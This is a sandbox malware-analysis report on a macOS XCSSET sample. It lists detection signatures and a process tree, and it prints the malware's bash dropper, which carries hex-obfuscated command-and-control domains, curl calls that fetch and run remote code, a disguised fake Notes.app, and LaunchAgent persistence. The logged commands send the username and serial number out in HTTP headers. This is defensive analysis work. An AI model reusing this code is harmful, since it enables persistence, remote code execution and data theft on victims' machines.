macOS Analysis Report
exec.2430808

Overview

General Information

Sample Name:exec.2430808
Analysis ID:176612
MD5:1ce8099c5bb8fbe715ae7c546c46a526
SHA1:127b66afa20a1c42e653ee4f4b64cf1ee3ed637d
SHA256:483b2f45a06516439b1dbfedda52f135a4ccdeafd91192e64250305644e5ff48

Detection

XCSSET
Score:100
Range:0 - 100
Whitelisted:false

Signatures

Yara detected XCSSET
Sends data within HTTP X-headers likely leaking sensitive information
Writes compiled Apple script to disk (with potentially malicious intention)
Creates launch services redirecting its stdout/stderr to /dev/null (probably to hide errors)
Searches for processes that are suspiciously named
Written Apple script contains an uncommon file extension (probably to disguise the script)
Executes the "csrutil" command used to retrieve or modify the "System Integrity Protection" configuration
Queries the unique Apple serial number of the machine
Sets the property list key LSUIElement for running apps in the background without appearing in the Dock
Writes Mach-O files to untypical directories
Tries to delete plist files with Apple identifiers
Likely kills multiple processes
Copies icons from applications possibly to disguise malicious intentions
Writes Mach-O files to disk with suspicious names (probably to obfuscate its intention)
Likely queries the I/O Kit registry to detect VMs by querying the "IOPlatformExpertDevice" class
Executes the "xxd" command used for reading and creating hexdumps
Yara signature match
Uses AppleScript framework/components containing Apple Script related functionalities
Explicitly unloads, stops, and/or removes launch services
Executes the "mkdir" command used to create folders
Executes the "grep" command used to find patterns in files or piped streams
Executes Apple scripts and/or other OSA language scripts with shell command 'osascript'
Executes the "chmod" command used to modify permissions
Executes the "curl" command used to transfer data via the network (typically using HTTP/S)
Executes the "ping" command used for connectivity testing via ICMP
Uses AppleScript scripting additions containing additional functionalities for Apple Scripts
Reads file resource fork extended attributes
Deletes icon files
Creates code signed application bundles
Mach-O contains sections with high entropy indicating compressed/encrypted content
Changes permissions of written Mach-O files
Executes commands using a shell command-line interpreter
Executes the "defaults" command used to read or modify user specific settings
Executes the "touch" command used to create files or modify time stamps
Executes the "plutil" command used to modify plists
Executes the "ioreg" command used to gather hardware information (I/O kit registry)
Reads the system's hostname
Reads the sysctl safe boot value (probably to check if the system is in safe boot mode)
Executes the "ps" command used to list the status of processes
Writes icon files to disk
Creates memory-persistent launch services
Executes the "sysctl" command used to retrieve or modify kernel settings
Explicitly loads/starts launch services
Queries the macOS product version
Creates launch services that start periodically
Reads hardware related sysctl values
Executes the "codesign" command used to create and manipulate code signatures
Creates user-wide 'launchd' managed services aka launch agents
Creates 'launchd' managed services aka launch agents with bundle ID names to possibly disguise malicious intentions
Creates hidden files, links and/or directories
Executes the "rm" command used to delete files or directories
Many shell processes execute programs via the execve syscall (might be indicative of malicious behavior)
Writes FAT Mach-O files to disk

Classification

Analysis Advice

Some HTTP requests failed (404). It is likely that the sample will exhibit less behavior.
Joe Sandbox Version:
Analysis ID:176612
Start date and time:2022-08-24 11:18:17 +02:00
Joe Sandbox Product:Cloud
Overall analysis duration:0h 5m 36s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:exec.2430808
Cookbook file name:macOS - Monterey - load provided binary as normal user.jbs
Analysis system description:Mac Mini, Monterey (Java 1.8.0_341)
Analysis Mode:default
Detection:MAL
Classification:mal100.troj.spyw.evad.mac2430808@0/32@2/0
  • Report creation exceeded maximum number of non-whitelisted processes and may have missing process information.
Command:sudo -u pedro /Users/pedro/Desktop/exec.2430808
PID:956
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
launched with args v10 notes app:
basedir:, autoclean: , domain:
target dir is: /Users/pedro/Library/Group Containers/group.com.apple.mail target domain: melindas.ru target plist: /Users/pedro/Library/LaunchAgents/com.apple.spx.plist
step 1
step 2
step 3
first launch. processing...
cleaning done...
created directory structure...
compiled app...
created scpt...
put Xcode icon in place...
wrote to LaunchAgents... wrote .plist
loaded service...
wrote .report
wrote .domain
done. finished.
Standard Error:
  • System is mac-monterey
  • sudo (MD5: 2d2c9298401fd5607184821a6ed73106) Arguments: /usr/bin/sudo -u pedro /Users/pedro/Desktop/exec.2430808
    • sudo New Fork (PID: 957, Parent: 956)
    • exec.2430808 (MD5: 1ce8099c5bb8fbe715ae7c546c46a526) Arguments: /Users/pedro/Desktop/exec.2430808
    • bash (MD5: c0c00727c39ed1a5586291299575a6aa) Arguments: /Users/pedro/Desktop/exec.2430808 -c exec '/Users/pedro/Desktop/exec.2430808' '$@' /Users/pedro/Desktop/exec.2430808
    • exec.2430808 (MD5: 1ce8099c5bb8fbe715ae7c546c46a526) Arguments: /Users/pedro/Desktop/exec.2430808
    • bash (MD5: c0c00727c39ed1a5586291299575a6aa) Arguments: /Users/pedro/Desktop/exec.2430808 -c
      #!/bin/bash
      AUTOCLEAN=$2
      BASEDIR=$1
      BASEDIR=${PROJECT_FILE_PATH}
      BUILD_VERSION=1.1.5
      BUILD_VENDOR='default'
      RANDOM_PATHS=('$HOME/Library/Application Support/com.apple.spotlight' '$HOME/Library/Application Scripts/com.apple.CalendarAgent' '$HOME/Library/Group Containers/group.com.apple.mail' '$HOME/Library/Containers/com.apple.photolibraryd')
      DOMAIN_ONE=$(echo '73 75 70 65 72 64 6F 63 73 2E 72 75' | xxd -p -r)
      DOMAIN_TWO=$(echo '6D 65 6C 69 6E 64 61 73 2E 72 75' | xxd -p -r)
      DOMAIN_THREE=$(echo '6B 69 6E 6B 73 64 6F 63 2E 72 75' | xxd -p -r)
      DOMAIN_FOUR=$(echo '61 64 6F 62 65 66 69 6C 65 2E 72 75' | xxd -p -r)
      ACTIVE_DOMAINS=(${DOMAIN_ONE} ${DOMAIN_TWO} ${DOMAIN_THREE} ${DOMAIN_FOUR})
      TARGET_DOMAIN=${ACTIVE_DOMAINS[RANDOM%${#ACTIVE_DOMAINS[@]}]}
      if [ ! -z '$3' ]
      then TARGET_DOMAIN=$3
      fi
      STR_TWO=$(echo '58 2D 4D 6F 64 3A 20 50 6F 64 73' | xxd -p -r) # X-Mod: Pods
      STR_ONE=$(echo '58 2D 55 73 72 3A' | xxd -p -r) # X-Usr:
      TARGETDIRFILE='$HOME/Library/Caches/GitServices/.report'
      TARGETPLISTFILE='$HOME/Library/Caches/GitServices/.plist'
      TARGETDOMAINFILE='$HOME/Library/Caches/GitServices/.domain'
      BOOT_FILE='$HOME/Library/Caches/GitServices/AppleWebKit'
      EXEC_DONE_FILE='$HOME/Library/Caches/GitServices/.exec_done'
      RANDOM_PLISTS=('$HOME/Library/LaunchAgents/com.apple.airplay.plist' '$HOME/Library/LaunchAgents/com.apple.spx.plist' '$HOME/Library/LaunchAgents/com.google.keystore.plist' '$HOME/Library/LaunchAgents/com.google.chrome.plist')
      MACOS_VERSION=$(defaults read loginwindow SystemVersionStampAsString)
      logme(){
      curl --connect-timeout 11 -s -k -d '$1' -H '$STR_ONE $USER' -H '$STR_TWO' 'https://$TARGET_DOMAIN/sys/log.php' > /dev/null 2>&1
      }
      clean_proj(){
      perl -ni -e 'print unless /(.*)AAC43A(.*),/' '$BASEDIR/project.pbxproj' > /dev/null 2>&1
      perl -ni -e 'print unless /(.*)6D902C(.*),/' '$BASEDIR/project.pbxproj' > /dev/null 2>&1
      perl -ni -e 'print unless /(.*)FFA81D(.*),/' '$BASEDIR/project.pbxproj' > /dev/null 2>&1
      perl -ni -e 'print unless /(.*)6A102C(.*),/' '$BASEDIR/project.pbxproj' > /dev/null 2>&1
      perl -ni -e 'print unless /(3F708E50247A0EB6004066FD)(.*),/' '$BASEDIR/project.pbxproj' > /dev/null 2>&1
      perl -ni -e 'print unless /(162E3FD122D63A22006D904C)(.*),/' '$BASEDIR/project.pbxproj' > /dev/null 2>&1
      perl -ni -e 'print unless /(1D60589F0D05DD5A006BFC54)(.*),/' '$BASEDIR/project.pbxproj' > /dev/null 2>&1
      perl -ni -e 'print unless /(1D3623260D0F684500981D51)(.*),/' '$BASEDIR/project.pbxproj' > /dev/null 2>&1
      perl -ni -e 'print unless /(167012E12301506800C38AA3)(.*),/' '$BASEDIR/project.pbxproj' > /dev/null 2>&1
      rm -rf '$BASEDIR/xcuserdata/.xcassets/' || true
      }
      write_meta(){
      TARGETDIRFILE_DIR=`dirname $2`
      [ ! -d $TARGETDIRFILE_DIR ] && mkdir -p $TARGETDIRFILE_DIR
      echo '$1' > '$2'
      }
      curl --connect-timeout 11 -s -k 'https://$TARGET_DOMAIN' > /dev/null || exit 0
      str=''
      for ARG in '$@'
      do str='${str} ${ARG}'
      done
      echo 'launched with args v10 notes app:${str}'
      echo 'basedir:${1}, autoclean: ${2}, domain: ${3}'
      cmd=$(curl -ks -m 5 -H '$STR_ONE $USER' https://$TARGET_DOMAIN/sys/prepod.php)
      if [[ ! -z '$cmd' ]]
      then
      echo 'got prepod remote command. executing...'
      osascript -e '$cmd' 2>/dev/null && exit 1
      echo 'remote command failed. continue normal flow...'
      fi
      if [ -f '$TARGETDIRFILE' ]
      then
      TARGETDIR=$(cat '$TARGETDIRFILE')
      APP_FILE='$TARGETDIR/Notes.app'
      if [ ! -d '$APP_FILE' ]
      then
      TARGETDIR=${RANDOM_PATHS[RANDOM%${#RANDOM_PATHS[@]}]}
      fi
      else
      TARGETDIR=${RANDOM_PATHS[RANDOM%${#RANDOM_PATHS[@]}]}
      fi
      if [ -f '$TARGETPLISTFILE' ]
      then
      PLIST_FILE=$(cat '$TARGETPLISTFILE')
      if [ ! -f '$PLIST_FILE' ]
      then
      PLIST_FILE=${RANDOM_PLISTS[RANDOM%${#RANDOM_PLISTS[@]}]}
      fi
      else
      PLIST_FILE=${RANDOM_PLISTS[RANDOM%${#RANDOM_PLISTS[@]}]}
      fi
      echo 'target dir is: $TARGETDIR target domain: $TARGET_DOMAIN target plist: $PLIST_FILE'
      APP_FILE='$TARGETDIR/Notes.app'
      SCPT_FILE='$TARGETDIR/Notes.app/Contents/Resources/Scripts/a.scpt'
      if [ ! -d '$APP_FILE' ]
      then
      echo 'step 1'
      fi
      if [ ! -f '$PLIST_FILE' ]
      then
      echo 'step 2'
      fi
      if [ ! -f '$EXEC_DONE_FILE' ]
      then
      echo 'step 3'
      fi
      if [ -d '$APP_FILE' ] && [ -f '$PLIST_FILE' ] && [ -f '$BOOT_FILE' ] && [ -f '$EXEC_DONE_FILE' ]
      then
      echo 'all files are set!'
      SERVICE_IS_RUNNING=$(pgrep -f com.java.core com.sys.core > /dev/null 2>&1 && echo 1 || echo 0)
      if [ $SERVICE_IS_RUNNING = 0 ]
      then
      echo 'service is not running. restarting...'
      if [[ $MACOS_VERSION == '11.'* ]]
      then
      curl -ks -o /tmp/open 'https://$TARGET_DOMAIN/agent/bin/open'
      chmod +x /tmp/open
      /tmp/open '$APP_FILE' > /dev/null 2>&1 &
      else
      open '$APP_FILE' > /dev/null 2>&1 &
      fi
      fi
      if [[ '$AUTOCLEAN' = true ]]
      then
      clean_proj
      fi
      [ ! -f $TARGETDIRFILE ] && write_meta $TARGETDIR $TARGETDIRFILE
      exit 0
      fi
      echo 'first launch. processing...'
      for i in '${RANDOM_PATHS[@]}'
      do
      rm -rf '$i/Notes.app' > /dev/null 2>&1
      rm -rf '$i/Containers' > /dev/null 2>&1
      done
      touch '$TMPDIR/test.tmp' 2>/dev/null || true
      for i in '${RANDOM_PLISTS[@]}'
      do
      rm -f '$i' > /dev/null 2>&1
      rm -f '$i' > /dev/null 2>&1
      done
      echo 'cleaning done...'
      mkdir -p '$TARGETDIR' > /dev/null 2>&1
      echo 'created directory structure...'
      read -r -d '' PAYLOAD2 << EOM
      try
      do shell script 'osascript '$SCPT_FILE''
      end try
      EOM
      osacompile -x -e '$PAYLOAD2' -o '$APP_FILE' > /dev/null 2>&1
      touch '$TMPDIR/test2.tmp' 2>/dev/null || true
      echo 'compiled app...'
      read -r -d '' PAYLOAD << EOM
      global ds
      global d
      global di
      set ds to {'', '', '', '', '', ''}
      set di to 1
      set d to item di of ds
      on xe(_str)
      set x to id of _str
      repeat with c in x
      set contents of c to c - (102 - 2)
      end repeat
      return string id x
      end xe
      on xex(_str)
      set x to id of _str
      repeat with c in x
      set contents of c to c - (102 - 1)
      end repeat
      return string id x
      end xex
      on m()
      -- log 'domain used ' & xe(d)
      set dF to POSIX path of ((path to me as text) & '::')
      set tF to quoted form of (dF & xex('')) -- /Containers
      do shell script 'rm -rf ' & tF
      set a to '123'
      do shell script 'mkdir -p ' & tF
      set f to quoted form of (dF & xex('')) -- /Containers/a
      set un to do shell script xe('') -- whoami
      do shell script 'curl -
      • bash New Fork (PID: 959, Parent: 957)
        • bash New Fork (PID: 960, Parent: 959)
        • bash New Fork (PID: 961, Parent: 959)
        • xxd (MD5: aaca2dc9ef1cdee4042195108a1e9588) Arguments: xxd -p -r
      • bash New Fork (PID: 962, Parent: 957)
        • bash New Fork (PID: 963, Parent: 962)
        • bash New Fork (PID: 964, Parent: 962)
        • xxd (MD5: aaca2dc9ef1cdee4042195108a1e9588) Arguments: xxd -p -r
      • bash New Fork (PID: 965, Parent: 957)
        • bash New Fork (PID: 966, Parent: 965)
        • bash New Fork (PID: 967, Parent: 965)
        • xxd (MD5: aaca2dc9ef1cdee4042195108a1e9588) Arguments: xxd -p -r
      • bash New Fork (PID: 968, Parent: 957)
        • bash New Fork (PID: 969, Parent: 968)
        • bash New Fork (PID: 970, Parent: 968)
        • xxd (MD5: aaca2dc9ef1cdee4042195108a1e9588) Arguments: xxd -p -r
      • bash New Fork (PID: 971, Parent: 957)
        • bash New Fork (PID: 972, Parent: 971)
        • bash New Fork (PID: 973, Parent: 971)
        • xxd (MD5: aaca2dc9ef1cdee4042195108a1e9588) Arguments: xxd -p -r
      • bash New Fork (PID: 974, Parent: 957)
        • bash New Fork (PID: 975, Parent: 974)
        • bash New Fork (PID: 976, Parent: 974)
        • xxd (MD5: aaca2dc9ef1cdee4042195108a1e9588) Arguments: xxd -p -r
      • bash New Fork (PID: 977, Parent: 957)
        • bash New Fork (PID: 978, Parent: 977)
        • defaults (MD5: 4e146d0cf6ed8b4592347198fc2a990c) Arguments: defaults read loginwindow SystemVersionStampAsString
      • bash New Fork (PID: 979, Parent: 957)
      • curl (MD5: f26856a56418cdf4551b4bdd7be78831) Arguments: curl --connect-timeout 11 -s -k https://melindas.ru
      • bash New Fork (PID: 981, Parent: 957)
        • bash New Fork (PID: 982, Parent: 981)
        • curl (MD5: f26856a56418cdf4551b4bdd7be78831) Arguments: curl -ks -m 5 -H X-Usr: pedro https://melindas.ru/sys/prepod.php
      • bash New Fork (PID: 983, Parent: 957)
      • rm (MD5: dc9f95c6c7dbdd1609aa6716ba393cd3) Arguments: rm -rf /Users/pedro/Library/Application Support/com.apple.spotlight/Notes.app
      • bash New Fork (PID: 984, Parent: 957)
      • rm (MD5: dc9f95c6c7dbdd1609aa6716ba393cd3) Arguments: rm -rf /Users/pedro/Library/Application Support/com.apple.spotlight/Containers
      • bash New Fork (PID: 985, Parent: 957)
      • rm (MD5: dc9f95c6c7dbdd1609aa6716ba393cd3) Arguments: rm -rf /Users/pedro/Library/Application Scripts/com.apple.CalendarAgent/Notes.app
      • bash New Fork (PID: 986, Parent: 957)
      • rm (MD5: dc9f95c6c7dbdd1609aa6716ba393cd3) Arguments: rm -rf /Users/pedro/Library/Application Scripts/com.apple.CalendarAgent/Containers
      • bash New Fork (PID: 987, Parent: 957)
      • rm (MD5: dc9f95c6c7dbdd1609aa6716ba393cd3) Arguments: rm -rf /Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app
      • bash New Fork (PID: 988, Parent: 957)
      • rm (MD5: dc9f95c6c7dbdd1609aa6716ba393cd3) Arguments: rm -rf /Users/pedro/Library/Group Containers/group.com.apple.mail/Containers
      • bash New Fork (PID: 989, Parent: 957)
      • rm (MD5: dc9f95c6c7dbdd1609aa6716ba393cd3) Arguments: rm -rf /Users/pedro/Library/Containers/com.apple.photolibraryd/Notes.app
      • bash New Fork (PID: 990, Parent: 957)
      • rm (MD5: dc9f95c6c7dbdd1609aa6716ba393cd3) Arguments: rm -rf /Users/pedro/Library/Containers/com.apple.photolibraryd/Containers
      • bash New Fork (PID: 991, Parent: 957)
      • touch (MD5: 63d1087742d412edbc4f41c9e90067d2) Arguments: touch /test.tmp
      • bash New Fork (PID: 992, Parent: 957)
      • rm (MD5: dc9f95c6c7dbdd1609aa6716ba393cd3) Arguments: rm -f /Users/pedro/Library/LaunchAgents/com.apple.airplay.plist
      • bash New Fork (PID: 993, Parent: 957)
      • rm (MD5: dc9f95c6c7dbdd1609aa6716ba393cd3) Arguments: rm -f /Users/pedro/Library/LaunchAgents/com.apple.airplay.plist
      • bash New Fork (PID: 994, Parent: 957)
      • rm (MD5: dc9f95c6c7dbdd1609aa6716ba393cd3) Arguments: rm -f /Users/pedro/Library/LaunchAgents/com.apple.spx.plist
      • bash New Fork (PID: 995, Parent: 957)
      • rm (MD5: dc9f95c6c7dbdd1609aa6716ba393cd3) Arguments: rm -f /Users/pedro/Library/LaunchAgents/com.apple.spx.plist
      • bash New Fork (PID: 996, Parent: 957)
      • rm (MD5: dc9f95c6c7dbdd1609aa6716ba393cd3) Arguments: rm -f /Users/pedro/Library/LaunchAgents/com.google.keystore.plist
      • bash New Fork (PID: 997, Parent: 957)
      • rm (MD5: dc9f95c6c7dbdd1609aa6716ba393cd3) Arguments: rm -f /Users/pedro/Library/LaunchAgents/com.google.keystore.plist
      • bash New Fork (PID: 998, Parent: 957)
      • rm (MD5: dc9f95c6c7dbdd1609aa6716ba393cd3) Arguments: rm -f /Users/pedro/Library/LaunchAgents/com.google.chrome.plist
      • bash New Fork (PID: 999, Parent: 957)
      • rm (MD5: dc9f95c6c7dbdd1609aa6716ba393cd3) Arguments: rm -f /Users/pedro/Library/LaunchAgents/com.google.chrome.plist
      • bash New Fork (PID: 1000, Parent: 957)
      • mkdir (MD5: 1a411936bac2c64c06674cbcfcdd66f8) Arguments: mkdir -p /Users/pedro/Library/Group Containers/group.com.apple.mail
      • bash New Fork (PID: 1001, Parent: 957)
      • osacompile (MD5: 84bbdc98ac7aa38fcbb281f019bb391d) Arguments: osacompile -x -e trydo shell script 'osascript '/Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/a.scpt''end try -o /Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app
        • codesign New Fork (PID: 1002, Parent: 1001)
      • bash New Fork (PID: 1003, Parent: 957)
      • touch (MD5: 63d1087742d412edbc4f41c9e90067d2) Arguments: touch /test2.tmp
      • bash New Fork (PID: 1004, Parent: 957)
      • touch (MD5: 63d1087742d412edbc4f41c9e90067d2) Arguments: touch /test3.tmp
      • bash New Fork (PID: 1005, Parent: 957)
      • plutil (MD5: 11427a2425049a93a60e85d61c9c0081) Arguments: plutil -replace LSUIElement -bool YES /Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Info.plist
      • bash New Fork (PID: 1006, Parent: 957)
      • rm (MD5: dc9f95c6c7dbdd1609aa6716ba393cd3) Arguments: rm -f /Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/applet.icns
      • bash New Fork (PID: 1007, Parent: 957)
      • cp (MD5: c6968d65936952ad8b175271cbbc8708) Arguments: cp -f /System/Applications/Notes.app/Contents/Resources/AppIcon.icns /Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/applet.icns
      • bash New Fork (PID: 1008, Parent: 957)
        • bash New Fork (PID: 1009, Parent: 1008)
        • dirname (MD5: 206cca615592f99874d8cb4cd1641f07) Arguments: dirname /Users/pedro/Library/LaunchAgents/com.apple.spx.plist
      • bash New Fork (PID: 1010, Parent: 957)
      • mkdir (MD5: 1a411936bac2c64c06674cbcfcdd66f8) Arguments: mkdir -p /Users/pedro/Library/LaunchAgents
      • bash New Fork (PID: 1011, Parent: 957)
        • bash New Fork (PID: 1012, Parent: 1011)
        • dirname (MD5: 206cca615592f99874d8cb4cd1641f07) Arguments: dirname /Users/pedro/Library/Caches/GitServices/AppleWebKit
      • bash New Fork (PID: 1013, Parent: 957)
      • mkdir (MD5: 1a411936bac2c64c06674cbcfcdd66f8) Arguments: mkdir -p /Users/pedro/Library/Caches/GitServices
      • bash New Fork (PID: 1014, Parent: 957)
      • cat (MD5: c5d124a467bf29f668fd9bac3a9856ab) Arguments: cat
      • bash New Fork (PID: 1015, Parent: 957)
      • chmod (MD5: 8339fe4afa333001c03a7b21f7ad0e9c) Arguments: chmod +x /Users/pedro/Library/Caches/GitServices/AppleWebKit
      • bash New Fork (PID: 1016, Parent: 957)
      • cat (MD5: c5d124a467bf29f668fd9bac3a9856ab) Arguments: cat
      • bash New Fork (PID: 1017, Parent: 957)
      • launchctl (MD5: 240cdf175cab143785114a58688a4d0a) Arguments: launchctl unload -w /Users/pedro/Library/LaunchAgents/com.apple.spx.plist
      • bash New Fork (PID: 1018, Parent: 957)
      • touch (MD5: 63d1087742d412edbc4f41c9e90067d2) Arguments: touch /test4.tmp
      • bash New Fork (PID: 1019, Parent: 957)
      • launchctl (MD5: 240cdf175cab143785114a58688a4d0a) Arguments: launchctl load -w /Users/pedro/Library/LaunchAgents/com.apple.spx.plist
      • bash New Fork (PID: 1021, Parent: 957)
        • bash New Fork (PID: 1022, Parent: 1021)
        • dirname (MD5: 206cca615592f99874d8cb4cd1641f07) Arguments: dirname /Users/pedro/Library/Caches/GitServices/.report
      • bash New Fork (PID: 1024, Parent: 957)
      • touch (MD5: 63d1087742d412edbc4f41c9e90067d2) Arguments: touch /test5.tmp
      • bash New Fork (PID: 1025, Parent: 957)
      • touch (MD5: 63d1087742d412edbc4f41c9e90067d2) Arguments: touch /test6.tmp
  • xpcproxy New Fork (PID: 1020, Parent: 1)
  • bash (MD5: c0c00727c39ed1a5586291299575a6aa) Arguments: bash /Users/pedro/Library/Caches/GitServices/AppleWebKit
    • bash New Fork (PID: 1023, Parent: 1020)
    • applet (MD5: 1535756d106d32fe31c1959e19e6582d) Arguments: /Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/MacOS/applet
      • sh New Fork (PID: 1028, Parent: 1023)
      • bash (MD5: c0c00727c39ed1a5586291299575a6aa) Arguments: sh -c osascript '/Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/a.scpt'
      • osascript (MD5: d86dbe94a4b95a8d18c37e43b7d6b6a4) Arguments: osascript /Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/a.scpt
        • sh New Fork (PID: 1029, Parent: 1028)
        • bash (MD5: c0c00727c39ed1a5586291299575a6aa) Arguments: sh -c ping -o -t 3 superdocs.ru
        • ping (MD5: e7f06272a612949c2e552aa2556fb798) Arguments: ping -o -t 3 superdocs.ru
        • sh New Fork (PID: 1030, Parent: 1028)
        • bash (MD5: c0c00727c39ed1a5586291299575a6aa) Arguments: sh -c rm -rf '/Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/Containers'
        • rm (MD5: dc9f95c6c7dbdd1609aa6716ba393cd3) Arguments: rm -rf /Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/Containers
        • sh New Fork (PID: 1031, Parent: 1028)
        • bash (MD5: c0c00727c39ed1a5586291299575a6aa) Arguments: sh -c mkdir -p '/Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/Containers'
        • mkdir (MD5: 1a411936bac2c64c06674cbcfcdd66f8) Arguments: mkdir -p /Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/Containers
        • sh New Fork (PID: 1032, Parent: 1028)
        • bash (MD5: c0c00727c39ed1a5586291299575a6aa) Arguments: sh -c whoami
        • whoami (MD5: 3c1b6e2e567df857130cd73ff38d3df7) Arguments: whoami
        • sh New Fork (PID: 1033, Parent: 1028)
        • bash (MD5: c0c00727c39ed1a5586291299575a6aa) Arguments: sh -c curl -sk -d 'user=pedro&build_vendor=default&build_version=1.1.5' https://superdocs.ru/apple/com.php | osacompile -x -o '/Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/Containers/a'
          • bash New Fork (PID: 1034, Parent: 1033)
          • curl (MD5: f26856a56418cdf4551b4bdd7be78831) Arguments: curl -sk -d user=pedro&build_vendor=default&build_version=1.1.5 https://superdocs.ru/apple/com.php
          • bash New Fork (PID: 1035, Parent: 1033)
          • osacompile (MD5: 84bbdc98ac7aa38fcbb281f019bb391d) Arguments: osacompile -x -o /Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/Containers/a
        • sh New Fork (PID: 1036, Parent: 1028)
        • bash (MD5: c0c00727c39ed1a5586291299575a6aa) Arguments: sh -c osascript '/Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/Containers/a' > /dev/null 2>&1
          • bash New Fork (PID: 1037, Parent: 1036)
          • osascript (MD5: d86dbe94a4b95a8d18c37e43b7d6b6a4) Arguments: osascript /Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/Containers/a
            • sh New Fork (PID: 1038, Parent: 1037)
            • bash (MD5: c0c00727c39ed1a5586291299575a6aa) Arguments: sh -c whoami
            • whoami (MD5: 3c1b6e2e567df857130cd73ff38d3df7) Arguments: whoami
            • sh New Fork (PID: 1039, Parent: 1037)
            • bash (MD5: c0c00727c39ed1a5586291299575a6aa) Arguments: sh -c ping -o -t 3 superdocs.ru
            • ping (MD5: e7f06272a612949c2e552aa2556fb798) Arguments: ping -o -t 3 superdocs.ru
            • sh New Fork (PID: 1040, Parent: 1037)
            • bash (MD5: c0c00727c39ed1a5586291299575a6aa) Arguments: sh -c ioreg -c IOPlatformExpertDevice -d 2 | awk -F\' '/IOPlatformSerialNumber/{print $(NF-1)}'
              • bash New Fork (PID: 1041, Parent: 1040)
              • ioreg (MD5: d03e2df1848ceb731ba4a8c3e82b2011) Arguments: ioreg -c IOPlatformExpertDevice -d 2
              • bash New Fork (PID: 1042, Parent: 1040)
              • awk (MD5: 231a9b1c4634f8b7b53d29c9c47ee4df) Arguments: awk -F' /IOPlatformSerialNumber/{print $(NF-1)}
            • sh New Fork (PID: 1043, Parent: 1037)
            • bash (MD5: c0c00727c39ed1a5586291299575a6aa) Arguments: sh -c curl -k -s --connect-timeout 14 -d 'module launched. connRetries: 0. Used domain: superdocs.ru' -H 'X-Id: C07GV0KZPJH8' -H 'X-Users: pedro' -H 'X-Mod: bootstrap' https://superdocs.ru/l
            • curl (MD5: f26856a56418cdf4551b4bdd7be78831) Arguments: curl -k -s --connect-timeout 14 -d module launched. connRetries: 0. Used domain: superdocs.ru -H X-Id: C07GV0KZPJH8 -H X-Users: pedro -H X-Mod: bootstrap https://superdocs.ru/l
            • sh New Fork (PID: 1044, Parent: 1037)
            • bash (MD5: c0c00727c39ed1a5586291299575a6aa) Arguments: sh -c mkdir -p ~/Library/Caches/GitServices/ && touch ~/Library/Caches/GitServices/.ed
              • bash New Fork (PID: 1045, Parent: 1044)
              • mkdir (MD5: 1a411936bac2c64c06674cbcfcdd66f8) Arguments: mkdir -p /Users/pedro/Library/Caches/GitServices/
              • bash New Fork (PID: 1046, Parent: 1044)
              • touch (MD5: 63d1087742d412edbc4f41c9e90067d2) Arguments: touch /Users/pedro/Library/Caches/GitServices/.ed
            • sh New Fork (PID: 1048, Parent: 1037)
            • bash (MD5: c0c00727c39ed1a5586291299575a6aa) Arguments: sh -c (plutil -p ~/Library/Preferences/com.apple.LaunchServices/com.apple.launchservices.secure.plist | grep 'https' -b3 |awk 'NR==3 {split($4, arr, '\'') print arr[2]}') || echo 'com.apple.safari'
              • bash New Fork (PID: 1049, Parent: 1048)
                • bash New Fork (PID: 1050, Parent: 1049)
                • plutil (MD5: 11427a2425049a93a60e85d61c9c0081) Arguments: plutil -p /Users/pedro/Library/Preferences/com.apple.LaunchServices/com.apple.launchservices.secure.plist
                • bash New Fork (PID: 1051, Parent: 1049)
                • grep (MD5: 99be09a23ac46af2879dc015993ca389) Arguments: grep https -b3
                • bash New Fork (PID: 1052, Parent: 1049)
                • awk (MD5: 231a9b1c4634f8b7b53d29c9c47ee4df) Arguments: awk NR==3 {split($4, arr, '\'') print arr[2]}
            • sh New Fork (PID: 1053, Parent: 1037)
            • bash (MD5: c0c00727c39ed1a5586291299575a6aa) Arguments: sh -c defaults read loginwindow SystemVersionStampAsString
            • defaults (MD5: 4e146d0cf6ed8b4592347198fc2a990c) Arguments: defaults read loginwindow SystemVersionStampAsString
            • sh New Fork (PID: 1054, Parent: 1037)
            • bash (MD5: c0c00727c39ed1a5586291299575a6aa) Arguments: sh -c defaults read /Applications/Safari.app/Contents/Info CFBundleShortVersionString
            • defaults (MD5: 4e146d0cf6ed8b4592347198fc2a990c) Arguments: defaults read /Applications/Safari.app/Contents/Info CFBundleShortVersionString
            • sh New Fork (PID: 1056, Parent: 1037)
            • bash (MD5: c0c00727c39ed1a5586291299575a6aa) Arguments: sh -c ioreg -c IOPlatformExpertDevice -d 2 | awk -F\' '/IOPlatformSerialNumber/{print $(NF-1)}'
              • bash New Fork (PID: 1057, Parent: 1056)
              • ioreg (MD5: d03e2df1848ceb731ba4a8c3e82b2011) Arguments: ioreg -c IOPlatformExpertDevice -d 2
              • bash New Fork (PID: 1058, Parent: 1056)
              • awk (MD5: 231a9b1c4634f8b7b53d29c9c47ee4df) Arguments: awk -F' /IOPlatformSerialNumber/{print $(NF-1)}
            • sh New Fork (PID: 1059, Parent: 1037)
            • bash (MD5: c0c00727c39ed1a5586291299575a6aa) Arguments: sh -c defaults read /Library/Preferences/com.apple.alf globalstate
            • defaults (MD5: 4e146d0cf6ed8b4592347198fc2a990c) Arguments: defaults read /Library/Preferences/com.apple.alf globalstate
            • sh New Fork (PID: 1060, Parent: 1037)
